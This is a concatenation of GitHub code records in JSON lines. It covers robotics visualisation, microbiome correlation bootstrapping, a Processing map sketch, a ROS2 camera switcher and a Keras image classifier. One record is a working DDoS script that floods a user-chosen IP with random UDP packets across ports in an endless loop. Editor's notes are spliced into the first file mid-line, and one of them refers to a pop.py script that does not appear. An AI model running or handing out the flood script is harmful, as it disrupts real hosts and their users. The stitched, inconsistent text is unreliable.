canon_source.init_scale = constants.NDF_BOWLS_INIT_SCALE\n elif args.task == \"bottle_in_box\":\n canon_source = utils.CanonObj.from_pickle(constants.NDF_BOTTLES_PCA_PATH)\n canon_source.init_scale = constants.NDF_BOTTLES_INIT_SCALE\n else:\n raise NotImplementedError()\n\n with open(args.load_path, \"rb\") as f:\n d = pickle.load(f)\n index, pos_robotiq = d[\"index\"], d[\"pos_robotiq\"]\n\n pcd = canon_source.to_pcd(utils.ObjParam(latent=np.zeros(canon_source.n_components)))\n\n pos = pcd[index]\n trans, _, _ = utils.best_fit_transform(pos, pos_robotiq)\n pcd = utils.transform_pcd(pcd, trans)\n\n fig = plt.figure()\n ax = fig.add_subplot(111, projection=\"3d\")\n update_axis(ax, pcd, pos_robotiq, vmin, vmax)\n\n slider_axes = []\n z = 0.\n for _ in range(canon_source.n_components + 1):\n slider_axes.append(fig.add_axes([0.25, z, 0.65, 0.03]))\n z += 
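Editor's note: the URL checker a few lines above (pop.py) hides every failure behind a bare except and can hang on a slow host. A hedged variant, a sketch rather than the author's code, that adds a timeout and catches only network errors:

import requests

url = input("enter URL: ")
try:
    r = requests.get(url, timeout=10)           # don't hang forever
    print("Website is up!" if r.status_code == 200 else "Website is down :(")
except requests.exceptions.RequestException:    # bad URL, DNS failure, refused, ...
    print("URL not valid, try again! (try with https://www.websiteofchoice.com)")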
0.05\n # we start at the bottom and move up\n slider_axes = list(reversed(slider_axes))\n\n sliders = []\n for i in range(canon_source.n_components):\n sliders.append(Slider(slider_axes[i], \"D{:d}\".format(i), smin, smax, valinit=0))\n button = Button(slider_axes[canon_source.n_components], \"Save pcd\")\n\n def sliders_on_changed(val):\n latents = np.array([[s.val for s in sliders]])\n source_pcd = canon_source.to_pcd(utils.ObjParam(latent=latents, scale=np.ones(3) * canon_source.init_scale))\n pos = source_pcd[index]\n trans, _, _ = utils.best_fit_transform(pos, pos_robotiq)\n source_pcd = utils.transform_pcd(source_pcd, trans)\n update_axis(ax, source_pcd, pos_robotiq, vmin, vmax)\n\n def button_on_changed(val):\n latents = np.array([[s.val for s in sliders]])\n obj_param = utils.ObjParam(latent=latents, scale=np.ones(3) * canon_source.init_scale)\n\n source_pcd = canon_source.to_pcd(obj_param)\n pos = source_pcd[index]\n trans, _, _ = utils.best_fit_transform(pos, pos_robotiq)\n source_pcd = utils.transform_pcd(source_pcd, trans)\n pos_trans = utils.transform_pcd(pos, trans)\n\n pos, quat = utils.transform_to_pos_quat(trans)\n obj_param.position = pos\n obj_param.quat = quat\n mesh = canon_source.to_transformed_mesh(obj_param)\n\n dir_path = \"data/warping_figure_4\"\n if not os.path.isdir(dir_path):\n os.makedirs(dir_path)\n i = 1\n for i in range(1, 1000):\n file_path = os.path.join(dir_path, f\"{i}.pcd\")\n if not os.path.isfile(file_path):\n break\n\n mesh.export(os.path.join(dir_path, f\"{i}.stl\"))\n viz_utils.save_o3d_pcd(source_pcd, os.path.join(dir_path, f\"{i}.pcd\"))\n viz_utils.save_o3d_pcd(pos_robotiq, os.path.join(dir_path, f\"points_robotiq_{i}.pcd\"))\n viz_utils.save_o3d_pcd(pos_trans, os.path.join(dir_path, f\"points_source_{i}.pcd\"))\n\n for s in sliders:\n s.on_changed(sliders_on_changed)\n button.on_clicked(button_on_changed)\n\n plt.show()\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"task\", type=str, help=constants.TASKS_DESCRIPTION)\nparser.add_argument(\"load_path\")\nmain(parser.parse_args())\n","repo_name":"ondrejbiza/fewshot","sub_path":"scripts/real_world/viz/show_pick_warping.py","file_name":"show_pick_warping.py","file_ext":"py","file_size_in_byte":4198,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"5691842314","text":"# using python2.7\n#python '/Users/dingfengwu/Desktop/NAFLD3/yonatanf-sparcc-3aff6141c3f1/SparCC.py' -h\n\nimport os\n\ndef run_cor(SPARCC_PATH, DATA_PATH, OUT_PATH, in_f, out_f, method):\n cmd = \"python \"+\"'\"+SPARCC_PATH+\"SparCC.py' '\"+DATA_PATH+in_f+\"' --cor_file='\"+OUT_PATH+out_f+\"' -a \"+method\n os.system(cmd)\n\ndef run_bootsrap(SPARCC_PATH, DATA_PATH, OUT_PATH, BS_PATH, in_f, out_f, out_p_f, method, times=1000):\n cmd = \"python \"+\"'\"+SPARCC_PATH+\"MakeBootstraps.py' '\"+DATA_PATH+in_f+\"' -n \"+str(times)+\" -t permutation_#.txt -p \"+BS_PATH\n os.system(cmd)\n bs_data_path = BS_PATH\n bs_out_path = BS_PATH\n for i in range(times):\n bs_in_f = 'permutation_'+str(i)+'.txt'\n bs_out_f = 'perm_cor_'+str(i)+'.txt'\n run_cor(SPARCC_PATH, bs_data_path, bs_out_path, bs_in_f, bs_out_f, method)\n cmd = \"python \"+\"'\"+SPARCC_PATH+\"PseudoPvals.py' '\"+OUT_PATH+out_f+\"' \"+BS_PATH+\"perm_cor_#.txt \"+str(times)+\" -o '\"+OUT_PATH+out_p_f+\"_one_sided.csv' -t one_sided\"\n os.system(cmd)\n cmd = \"python \"+\"'\"+SPARCC_PATH+\"PseudoPvals.py' '\"+OUT_PATH+out_f+\"' \"+BS_PATH+\"perm_cor_#.txt \"+str(times)+\" -o 
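Editor's note: show_pick_warping.py above leans on utils.best_fit_transform to align the warped points to the gripper points; the repo's helper returns a homogeneous transform, so this is only a hedged sketch of what such an SVD-based rigid fit typically computes (Kabsch / orthogonal Procrustes), with R and t returned separately:

import numpy as np

def best_fit_transform_sketch(A, B):
    # rotation R and translation t minimizing ||(A @ R.T + t) - B||
    # for paired N x 3 point sets
    cA, cB = A.mean(axis=0), B.mean(axis=0)
    H = (A - cA).T @ (B - cB)
    U, _, Vt = np.linalg.svd(H)
    R = Vt.T @ U.T
    if np.linalg.det(R) < 0:   # flip one axis to avoid a reflection
        Vt[-1] *= -1
        R = Vt.T @ U.T
    t = cB - R @ cA
    return R, t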
'\"+OUT_PATH+out_p_f+\"_two_sided.csv' -t two_sided\"\n os.system(cmd)\n\ndef main(SPARCC_PATH, DATA_PATH, OUT_PATH, BS_PATH, in_f, out_r_f, out_p_f, method, times):\n run_cor(SPARCC_PATH, DATA_PATH, OUT_PATH, in_f, out_r_f, method)\n run_bootsrap(SPARCC_PATH, DATA_PATH, OUT_PATH, BS_PATH, in_f, out_r_f, out_p_f, method, times)\n\n\nSPARCC_PATH = '/Users/dingfengwu/Desktop/NAFLD3/yonatanf-sparcc-3aff6141c3f1/'\nDATA_PATH = '/Users/dingfengwu/Desktop/NAFLD3/Data/RohitNC_Feature_60/'\nOUT_PATH = '/Users/dingfengwu/Desktop/NAFLD3/SparCC/RohitNC_Feature_60/'\nBS_PATH = '/Users/dingfengwu/Desktop/NAFLD3/SparCC/RohitNC_Feature_60/bootstrap/'\nBOOTSTRAP_TIMES = 999\n\n#in_f = 'counts_df.csv' # counts_df.csv counts_df_normal.csv counts_df_obese.csv counts_df_nash.csv\n#method = 'spearman' # spearman sparcc\n#out_r_f = in_f.split('.csv')[0]+'_'+method+'.csv'\n#out_p_f = in_f.split('.csv')[0]+'_'+method+'_p'\n#main(SPARCC_PATH, DATA_PATH, OUT_PATH, BS_PATH, in_f, out_r_f, out_p_f, method, BOOTSTRAP_TIMES)\n\n# 'counts_df.csv', 'counts_df_normal.csv', 'counts_df_obese.csv', 'counts_df_nash.csv'\nfor method in ['sparcc', 'spearman']:\n for in_f in ['counts_df_normal.csv', 'counts_df_nash.csv']:\n out_r_f = in_f.split('.csv')[0]+'_'+method+'.csv'\n out_p_f = in_f.split('.csv')[0]+'_'+method+'_p'\n main(SPARCC_PATH, DATA_PATH, OUT_PATH, BS_PATH, in_f, out_r_f, out_p_f, method, BOOTSTRAP_TIMES)\n","repo_name":"dfwlab/NAFLD_keystone","sub_path":"Code/run_sparcc.py","file_name":"run_sparcc.py","file_ext":"py","file_size_in_byte":2536,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"52"} +{"seq_id":"41642277204","text":"\"\"\"\nProva de conceito para mapa em 3D (câmera cotrolada pelo mouse)\n\"\"\"\n\nimport random as rnd\n\nTAMANHO = 50 # tamanho grade\nMAPA = []\n\ndef setup():\n global MAPA, COLUNAS, FILAS\n size(600, 600, P3D)\n COLUNAS = width / TAMANHO\n FILAS = height / TAMANHO\n for fila in range(FILAS):\n for coluna in range(COLUNAS):\n tipo = rnd.choice(Quadrado.TIPOS)\n altura = sorteiaAltura(tipo)\n quadrado = Quadrado(fila, coluna, tipo, altura)\n MAPA.append(quadrado)\n\ndef draw():\n '''for quadrado in MAPA:\n quadrado.desenha()\n '''\n background(0)\n camera(mouseX, mouseY*2, 500.0, # eyeX, eyeY, eyeZ\n width/2,height/2, 0.0, # centerX, centerY, centerZ\n 0.0, 1.0, 0.0) # upX, upY, upZ\n for fila in range(FILAS):\n for coluna in range(COLUNAS):\n quadrado = no_mapa(fila, coluna)\n quadrado.desenha()\n\nclass Quadrado():\n ''' Região quadrada do mapa'''\n \n AMARELO = color(255, 230, 0)\n AZUL_ESCURO = color(7, 0, 255)\n MARROM_ESCURO = color(85, 25, 27)\n VERDE_CLARO = color(10, 237, 7)\n MARROM_CLARO = color(193, 109, 111)\n VERDE_ESCURO = color(48, 72, 36)\n TIPOS = [\"mar\", \"montanha\", \"praia\", \"plano\", \"vila\", \"floresta\"]\n CORES = {\"mar\": AZUL_ESCURO,\n \"montanha\": MARROM_ESCURO,\n \"praia\": AMARELO,\n \"plano\": VERDE_CLARO,\n \"vila\": MARROM_CLARO,\n \"floresta\": VERDE_ESCURO}\n\n def __init__(self, fila, coluna, tipo, altura):\n self.fila = fila\n self.coluna = coluna\n self.tipo = tipo\n self.altura = altura\n self.cor = Quadrado.CORES[tipo]\n\n\n def desenha(self):\n posX, posY = self.coluna * TAMANHO, self.fila * TAMANHO\n with pushMatrix():\n translate(posX, posY)\n noStroke()\n fill(self.cor)\n pushMatrix()\n translate(0,0,self.altura)\n rect(0, 0, TAMANHO, TAMANHO)\n popMatrix()\n fill(255) # branco\n textSize(10) # para escrever o tipo se o mouse estiver perto\n if (dist(posX, posY, mouseX, mouseY) < TAMANHO * 
2):\n text(self.tipo, 0, 20, self.altura+5)\n \ndef no_mapa(fila, coluna):\n return MAPA[coluna + fila * COLUNAS]\n \ndef sorteiaAltura(tipo):\n #return 0 #(para demo plana)\n if tipo == \"mar\" or tipo == \"praia\":\n return 0\n elif tipo == \"montanha\":\n return 30\n else:\n return random (5,25)\n\n \n \n","repo_name":"villares/py.processing-play","sub_path":"mapa-jogo/mapa_tosco_3d/mapa_tosco_3d.pyde","file_name":"mapa_tosco_3d.pyde","file_ext":"pyde","file_size_in_byte":2560,"program_lang":"python","lang":"pt","doc_type":"code","stars":23,"dataset":"github-code","pt":"52"} +{"seq_id":"30666380669","text":"import json\nimport os\nimport rclpy\nfrom rclpy.node import Node\nfrom sensor_msgs.msg import Joy\nfrom rcl_interfaces.msg import ParameterDescriptor, IntegerRange, SetParametersResult\nfrom std_srvs.srv import Trigger\nfrom core.msg import Cam\nfrom core.srv import AddCamera\n\n# NOTE:\n # This program has 2 config dictionaries. \n # Standard (self.std_camera_config), and Master (self.master_config).\n # Standard can be changed via GUI parameters. Master cannot.\n # Master is referenced in the process of changing cameras.\n # Master always matches what's currently written in the JSON file.\n # At shutdown, depending on parameters, Standard is written to the JSON file.\n # Neither of these should be confused with self.active_cameras.\n # self.active cameras contains the ips of all of the currently connected cameras.\n # The config files contain all of the currently configured cameras.\n\nclass Camera_Switcher(Node):\n\n def __init__(self):\n super().__init__('camera_switcher')\n\n self.max_cameras = 8 # This is not a hard limit. Can change.\n \n self.log = self.get_logger() # Quick reference for ROS logging\n\n # Stores IPs of active cameras\n # Filling unused slots with empty dictionaries\n self.active_cameras = []\n self.current_camera_index = 0\n\n # Number of unnamed cameras. 
Used in generating IDs for new cams.\n self.unnamed_cams = 0\n\n # For remembering previous camera button presses\n # This way we only try to change when the button is first pushed\n # And not repeatedly when it is held down\n self.cached_button_input = [0, 0, 0, 0]\n self.cached_camera_index = None\n\n # Define config file path\n self.config_path = \"/home/jhsrobo/corews/src/pilot_gui/cam_config.json\"\n\n # Opens the JSON config file.\n self.check_config_integrity()\n self.open_config() # Creates both Standard and Master Config.\n\n # Set up a service for accepting new cameras from find_cameras\n self.camera_adder = self.create_service(AddCamera, \"add_camera\", self.add_camera_callback)\n\n # Set up a service for returning the first camera to view_cameras\n self.first_camera_srv = self.create_service(Trigger, 'first_camera', self.first_camera_callback)\n\n self.joy_sub = self.create_subscription(Joy, 'joy', self.change_cam_callback, 10)\n self.camera_pub = self.create_publisher(Cam, \"active_camera\", 10)\n\n self.declare_parameter('save_changes_on_shutdown', False)\n self.add_on_set_parameters_callback(self.parameters_callback)\n\n\n # Edit the camera config according to parameters\n # Get the name of the camera that was changed\n # Copy the entry from the intial_camera_config to the new assigned index\n # The entry is written to the new index in camera_config\n # And changes are written permanently depending on parameter\n def parameters_callback(self, params):\n for param in params:\n # List of parameters to ignore in this function\n if param.name not in [\"use_sim_time\", \"permanent_changes\", \"save_changes_on_shutdown\"]:\n new_index = param.value\n ID = param.name.replace('_index', '') # Get ID from parameter name\n master_index = int(self.get_master_index(ID))\n nickname = self.master_config[str(master_index)][\"nickname\"]\n\n # Update the config and the active cameras list\n self.delete_camera_entries(nickname)\n self.std_camera_config[str(new_index)] = self.master_config[str(master_index)]\n\n self.log_camera_assignment_change(nickname, new_index)\n\n return SetParametersResult(successful=True)\n\n\n # When the AddCamera service is requested (from find_cameras.py), \n # add the attached IP to the camera dict.\n def add_camera_callback(self, request, response):\n\n # Check to see if this IP is pre-registered in the config file\n ip_index = self.get_std_index(request.ip)\n if ip_index is not None:\n pass\n else:\n self.create_config_entry(request.ip)\n ip_index = self.get_std_index(request.ip) # Get new index once it's been added to config\n\n self.active_cameras.append(request.ip)\n self.new_cam_parameter(ip_index)\n\n return response\n\n # When view_cameras starts up, it requests for us to publish the currently active camera\n def first_camera_callback(self, request, response):\n if len(self.active_cameras) == 0: # If no cams connected, return early\n response.success = False\n return response\n \n # Get the index of the first camera in active_cameras\n self.current_camera_index = self.get_master_index(self.active_cameras[0])\n self.cached_camera_index = self.current_camera_index\n\n camera_msg = self.create_camera_msg()\n self.camera_pub.publish(camera_msg)\n response.success = True\n return response\n\n\n # Monitor controller input for D-Pad press\n # Used to change active camera\n def change_cam_callback(self, joy):\n\n change = False\n\n if joy.axes[6] or joy.axes[7]:\n # Minor consequence of this logic is:\n # If multiple buttons are pressed, the furthest clockwise 
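Editor's note: change_cam_callback around here decodes the D-pad from two joystick axes. A compact standalone sketch of the same mapping (axis conventions read off the code: axes[7] is up/down, axes[6] is left/right):

def dpad_to_index(ax6, ax7):
    # axes[7]: +1 = up, -1 = down; axes[6]: +1 = left, -1 = right
    if ax7 == 1.0:
        return 1   # up
    if ax6 == -1.0:
        return 2   # right
    if ax7 == -1.0:
        return 3   # down
    if ax6 == 1.0:
        return 4   # left
    return None

assert dpad_to_index(0.0, 1.0) == 1 and dpad_to_index(-1.0, 0.0) == 2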
takes priority\n # No big deal tbh. About as reasonable a solution as any.\n \n desired_camera_index = False\n\n # Also, this cached input stuff is so that holding the button does not trigger this repeatedly.\n if joy.axes[7] == 1.0 and not self.cached_button_input[0]: # Up button\n desired_camera_index = 1\n change = True\n if joy.axes[6] == -1.0 and not self.cached_button_input[1]: # Right Button\n desired_camera_index = 2\n change = True\n if joy.axes[7] == -1.0 and not self.cached_button_input[2]: # Down button\n desired_camera_index = 3\n change = True\n if joy.axes[6] == 1.0 and not self.cached_button_input[3]: # Left Button\n desired_camera_index = 4\n change = True\n\n # If a button state has changed...\n if change: \n # If there's an entry in the config file for this index...\n if str(desired_camera_index) in self.std_camera_config.keys(): \n # If there's an active camera with that IP...\n if self.std_camera_config[str(desired_camera_index)][\"ip\"] in self.active_cameras:\n # If it's not the same IP as the last one we published...\n if self.cached_camera_index is not desired_camera_index:\n self.current_camera_index = desired_camera_index\n camera_msg = self.create_camera_msg()\n self.camera_pub.publish(camera_msg)\n\n else: # If there is no active camera with that IP\n self.log.warn(\"No camera mapped to that button\") \n else: # If there is no entry in the config file for this index:\n self.log.warn(\"No camera mapped to that button\")\n \n self.cached_button_input = [joy.axes[7], joy.axes[6], joy.axes[7], joy.axes[6]]\n self.cached_camera_index = self.current_camera_index\n\n\n # Function for logging important information after remapping cameras\n def log_camera_assignment_change(self, nickname, new_index):\n \n # Put together a list of the nicknames of active cameras\n nickname_list = []\n for ip in self.active_cameras:\n master_index = self.get_master_index(ip)\n nickname_list.append(self.master_config[master_index][\"nickname\"])\n self.log.info('')\n self.log.info(\"{} camera assigned to index {}\".format(nickname, new_index))\n self.log.info(\"Assigned Camera List: {}\".format(self.get_nickname_printout()))\n\n\n # Creates a new parameter for a camera\n def new_cam_parameter(self, index):\n\n # Define the parameter settings\n int_range = IntegerRange()\n int_range.from_value = 1\n int_range.to_value = self.max_cameras\n int_range.step = 1\n ID = self.std_camera_config[index][\"ID\"]\n param_name = '{}_index'.format(ID)\n\n descriptor = ParameterDescriptor(integer_range = [int_range])\n\n self.declare_parameter(param_name, int(index), descriptor)\n\n\n # Populate a camera msg with all of the info about the current camera\n def create_camera_msg(self):\n index = str(self.current_camera_index)\n camera_msg = Cam()\n camera_msg.index = int(index)\n camera_msg.ip = self.std_camera_config[index][\"ip\"]\n camera_msg.gripper = self.std_camera_config[index][\"gripper\"]\n camera_msg.nickname = self.std_camera_config[index][\"nickname\"]\n\n return camera_msg\n\n\n # Generate a readable version of the current active cameras\n def get_nickname_printout(self):\n printout = {}\n for index in self.std_camera_config:\n if index != 0:\n printout[index] = self.std_camera_config[index][\"nickname\"]\n else:\n printout[index] = \" \"\n return str(printout)\n\n\n # Read the existing camera config into a dictionary\n # JSON files are read into nested dictionaries.\n # Also, keep in mind that although the key values are numbers 1-4, they are strings, not ints.\n def open_config(self):\n with 
open(self.config_path) as f:\n self.std_camera_config = json.load(f)\n\n # Save a version of the config for refererence when cameras are changed during runtime\n with open(self.config_path) as f:\n self.master_config = json.load(f)\n\n\n # Checks if the config file still exists.\n # If it doesn't, it creates a new one.\n def check_config_integrity(self):\n if os.path.isfile(self.config_path): \n return True\n else:\n empty_dict = {}\n self.log.info(\"cam_config.json not found\")\n self.log.info(\"Creating new camera config\")\n self.log.info(\"Edit pilot_gui/cam_config.json to save your settings\")\n with open(self.config_path, \"w\") as f:\n json.dump(empty_dict, f)\n\n\n # Scans the standard config for a certain attribute in inner dictionaries\n # Returns the index of that attribute if found\n def get_std_index(self, value):\n for index in self.std_camera_config:\n for key in self.std_camera_config[index]:\n if self.std_camera_config[index][key] == value:\n return index\n return None\n \n\n # Scans the master config for a certain attribute in inner dictionaries\n # Returns the index of that attribute if found\n def get_master_index(self, value):\n for index in self.master_config:\n for key in self.master_config[index]:\n if self.master_config[index][key] == value:\n return index\n return None\n\n\n # These functions search their indices for empty dict keys\n # If none are found, they create a new one.\n def find_available_std_index(self):\n for key in self.std_camera_config:\n if self.std_camera_config[key] == 0:\n return key\n return str(len(self.std_camera_config) + 1)\n\n\n def find_available_master_index(self):\n for key in self.master_config:\n if self.master_config[key] == 0:\n return key \n return str(len(self.master_config) + 1)\n\n\n # Creates a new entry in the config files for new cameras\n def create_config_entry(self, ip, gripper=\"Front\", ID=\"unnamed\", nickname = \"Unnamed\"):\n std_index = self.find_available_std_index() # Assign a new index\n master_index = self.find_available_master_index()\n \n # Give each unnamed cam a unique identifier\n if \"unnamed\" in ID or \"Unnamed\" in nickname:\n self.unnamed_cams +=1\n if ID == \"unnamed\":\n ID += str(self.unnamed_cams)\n if nickname == \"Unnamed\":\n nickname += str(self.unnamed_cams)\n \n self.std_camera_config[std_index] = { \"ip\" : ip,\n \"gripper\" : gripper,\n \"nickname\" : nickname,\n \"ID\" : ID }\n self.master_config[master_index] = { \"ip\" : ip,\n \"gripper\" : gripper,\n \"nickname\" : nickname,\n \"ID\" : ID }\n\n self.write_to_config()\n self.log.info(\"\")\n self.log.info(\"Created new camera config entry\")\n\n\n # Updates the contents of the config file with the contents of self.std_camera_config\n # Setting save_changes high means that it writes the std_camera_config to the JSON\n # This means that changes we made during runtime are reflected in the config file.\n # Otherwise, only new cameras will be added to the config file.\n def write_to_config(self, save_changes=False):\n config_json = json.dumps(self.master_config, indent=2)\n if save_changes: \n config_json = json.dumps(self.std_camera_config, indent=2)\n \n with open(self.config_path, \"w\") as f:\n f.write(config_json)\n\n # Simple getter to run at shutdown\n def get_save_changes (self):\n return self.get_parameter(\"save_changes_on_shutdown\").value\n \n\n def delete_camera_entries(self, nickname):\n target_index = self.get_std_index(nickname)\n while target_index is not None:\n self.std_camera_config.pop(str(target_index))\n target_index = 
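Editor's note: the helpers above persist the camera table as JSON, whose object keys are always strings. A minimal round-trip sketch (the IP and nickname are made-up values) showing why the code indexes the config with string keys like "1":

import json

config = {"1": {"ip": "192.168.1.10", "gripper": "Front",
                "nickname": "Bow", "ID": "bow_cam"}}
text = json.dumps(config, indent=2)
loaded = json.loads(text)
assert loaded["1"]["nickname"] == "Bow"   # keys come back as strings
assert 1 not in loaded                    # an integer lookup would miss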
self.get_std_index(nickname)\n\n\ndef main(args=None):\n rclpy.init(args=args)\n\n camera_switcher = Camera_Switcher()\n\n # Runs the program until shutdown is received\n try: rclpy.spin(camera_switcher)\n except KeyboardInterrupt:\n save_changes = camera_switcher.get_save_changes()\n camera_switcher.write_to_config(save_changes)\n\n # On shutdown, kill node\n camera_switcher.destroy_node()\n rclpy.shutdown()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"JHSRobo/pilot_gui","sub_path":"pilot_gui/switch_cameras.py","file_name":"switch_cameras.py","file_ext":"py","file_size_in_byte":14361,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"}
{"seq_id":"24544709914","text":"import sys\nimport os\nimport time\nimport socket\nimport random\nfrom datetime import datetime\n\n# Code Time\nnow = datetime.now()\nhour, minute, day, month, year = now.hour, now.minute, now.day, now.month, now.year\n\n# Create a UDP socket\nsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\npayload = random._urandom(1490)  # random payload; renamed from 'bytes' to avoid shadowing the builtin\n\n# Clear the screen\nos.system(\"clear\")\n\n# Print header\nprint(\"DDoS Attack Script\")\nprint(\"Author : HA-MRX\")\nprint(\"You Tube : https://www.youtube.com/channel/UCCgy7i_A5yhAEdY86rPOinA\")\nprint(\"github : https://github.com/Ha3MrX\")\nprint(\"Facebook : https://www.facebook.com/muhamad.jabar222\")\nprint()\n\n# Get the target IP and port from the user\nip = input(\"IP Target : \")\nport = int(input(\"Port : \"))\n\n# Clear the screen\nos.system(\"clear\")\nprint(\"Attack Starting\")\n\n# Progress bar: step is an int, so use it directly (len(step) would raise TypeError)\nfor step in range(5):\n time.sleep(5)\n print(f\"[{'=' * (step + 1)}{' ' * (4 - step)}] {(step + 1) * 25}%\")\n\n# Attack loop\nsent = 0\nwhile True:\n sock.sendto(payload, (ip, port))\n sent += 1\n print(f\"Sent {sent} packets to {ip} through port {port}\")\n port += 1\n if port == 65534:\n port = 1\n","repo_name":"avinashkranjan/Pentesting-and-Hacking-Scripts","sub_path":"Ddos_Attack_Script/DDOS_Attack_Script.py","file_name":"DDOS_Attack_Script.py","file_ext":"py","file_size_in_byte":1096,"program_lang":"python","lang":"en","doc_type":"code","stars":154,"dataset":"github-code","pt":"52"}
{"seq_id":"73810280804","text":"# 1. Save\n# 2. After saving, comment this out\n# 3.\n\n# import os\n\n# # set the horses/humans dataset paths\n# train_horse_dir = '../_data/image/horse-or-human/horses'\n# train_human_dir = '../_data/image/horse-or-human/humans'\n\n# # list of horse file names\n# train_horse_names = os.listdir(train_horse_dir)\n# print(train_horse_names[:10])\n\n# # list of human file names\n# train_human_names = os.listdir(train_human_dir)\n# print(train_human_names[:10])\n\n# # total number of horses/humans image files\n# print('total training horse images:', len(os.listdir(train_horse_dir))) #500\n# print('total training human images:', len(os.listdir(train_human_dir))) #527\n\nimport numpy as np\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\n\ntrain_datagen = ImageDataGenerator(\n rescale = 1./255,\n horizontal_flip=True,\n vertical_flip=True,\n width_shift_range=0.1,\n height_shift_range=0.1,\n rotation_range=5,\n zoom_range=0.1,\n shear_range=0.1,\n fill_mode='nearest',\n \n featurewise_center=True,\n featurewise_std_normalization=True, \n validation_split=0.2\n)\n\ntest_datagen = ImageDataGenerator( # evaluation only, so no augmentation is needed\n rescale=1./255\n) # Found 160 images belonging to 2 classes.\n\n# D:\\\\_data\\\\image\\\\brain\n\ntrain_generator = train_datagen.flow_from_directory(\n '../_data/image/horse-or-human',\n target_size=(150,150), # target size is adjustable\n batch_size=600,\n class_mode='categorical',\n shuffle=True,\n subset='training') # set as training data\n
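Editor's note: train_datagen above enables featurewise_center and featurewise_std_normalization but never calls fit(), so Keras will only warn and the statistics stay unset. A hedged sketch of fitting them on a sample batch first (sample_images is a stand-in array, not project data):

import numpy as np
from tensorflow.keras.preprocessing.image import ImageDataGenerator

datagen = ImageDataGenerator(featurewise_center=True,
                             featurewise_std_normalization=True)
sample_images = np.random.rand(32, 150, 150, 3)   # stand-in for real images
datagen.fit(sample_images)                        # computes the mean and std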
\nvalidation_generator = train_datagen.flow_from_directory(\n '../_data/image/horse-or-human',\n target_size=(150,150), # target size is adjustable\n batch_size=600,\n class_mode='categorical',\n subset='validation') # set as validation data\n\n \n\nprint(train_generator[0][0].shape) #(600, 150, 150, 3)\nprint(validation_generator[0][0].shape) #(205, 150, 150, 3)\n\nnp.save('../_save_npy/keras48_2_1_train_x.npy', arr= train_generator[0][0])\nnp.save('../_save_npy/keras48_2_1_train_y.npy', arr= train_generator[0][1])\nnp.save('../_save_npy/keras48_2_1_test_x.npy', arr= validation_generator[0][0])\nnp.save('../_save_npy/keras48_2_1_test_y.npy', arr= validation_generator[0][1])\n\n# print(train_generator[0])\n# print(validation_generator[0])\n\n# xy_train = train_datagen.flow_from_directory( \n# '../_data/image/horse-or-human/training_set',\n# target_size = (50,50), \n# batch_size = 10,\n# class_mode = 'binary',\n# shuffle = True,\n# ) \n\n# xy_test = test_datagen.flow_from_directory(\n# '../_data/image/cat_dog/test_set',\n# target_size = (50,50),\n# batch_size = 10, \n# class_mode = 'binary',\n# )\n\n# print(xy_train[0][0].shape, xy_train[0][1].shape) # (10, 50, 50, 3) (10,)\n\n# np.save('./_save_npy/keras48_2_train_x.npy', arr = train_generator[0][0])\n# np.save('./_save_npy/keras48_2_train_y.npy', arr = train_generator[0][1])\n# np.save('./_save_npy/keras48_2_test_x.npy', arr = validation_generator[0][0])\n# np.save('./_save_npy/keras48_2_test_y.npy', arr = validation_generator[0][1])\n\n\n# 2. Model\nfrom tensorflow.keras.models import Sequential\nfrom keras.layers import *\n\nmodel = Sequential()\nmodel.add(Conv2D(16, kernel_size=(3,3), padding='same', input_shape=(150,150,3), activation='relu'))\nmodel.add(MaxPooling2D(pool_size=(2,2)))\nmodel.add(Dropout(0.2))\n\nmodel.add(Conv2D(64, kernel_size=(3,3),padding='same', activation='relu'))\nmodel.add(MaxPooling2D(pool_size=(2,2)))\nmodel.add(Dropout(0.3))\n\nmodel.add(Conv2D(128, kernel_size=(3,3), padding='same', activation='relu'))\nmodel.add(MaxPooling2D(pool_size=(2,2)))\nmodel.add(Dropout(0.5))\n\nmodel.add(Flatten())\nmodel.add(Dense(64, activation='relu'))\nmodel.add(Dropout(0.5))\nmodel.add(Dense(2, activation='softmax'))\n\n# 3. Compile, train\nmodel.compile(loss='categorical_crossentropy', optimizer= 'adam', metrics=['acc'])\n\nhist = model.fit_generator(train_generator, epochs = 20, steps_per_epoch = 1, \n validation_data = validation_generator,\n validation_steps = 4,)\n\nacc = hist.history['acc']\nval_acc = hist.history['val_acc']\nloss = hist.history['loss']\nval_loss = hist.history['val_loss']\n\nprint('loss:', loss[-1])\nprint('val_loss:', val_loss[-1])\nprint('acc:', acc[-1])\nprint('val_acc:',val_acc [-1])\n\n\n# model.fit_generator(\n# train_generator,\n# steps_per_epoch = train_generator.samples // batch_size,\n# validation_data = validation_generator, \n# validation_steps = validation_generator.samples // batch_size,\n# epochs = nb_epochs)\n\n'''\nloss: 0.678576648235321\nval_loss: 0.9945012331008911\nacc: 0.5733333230018616\nval_acc: 0.5121951103210449\n'''","repo_name":"jangsejong/STUDY","sub_path":"keras/keras47_48Npy_IDG/keras48_2_horse_or_human_IDG.py","file_name":"keras48_2_horse_or_human_IDG.py","file_ext":"py","file_size_in_byte":4767,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
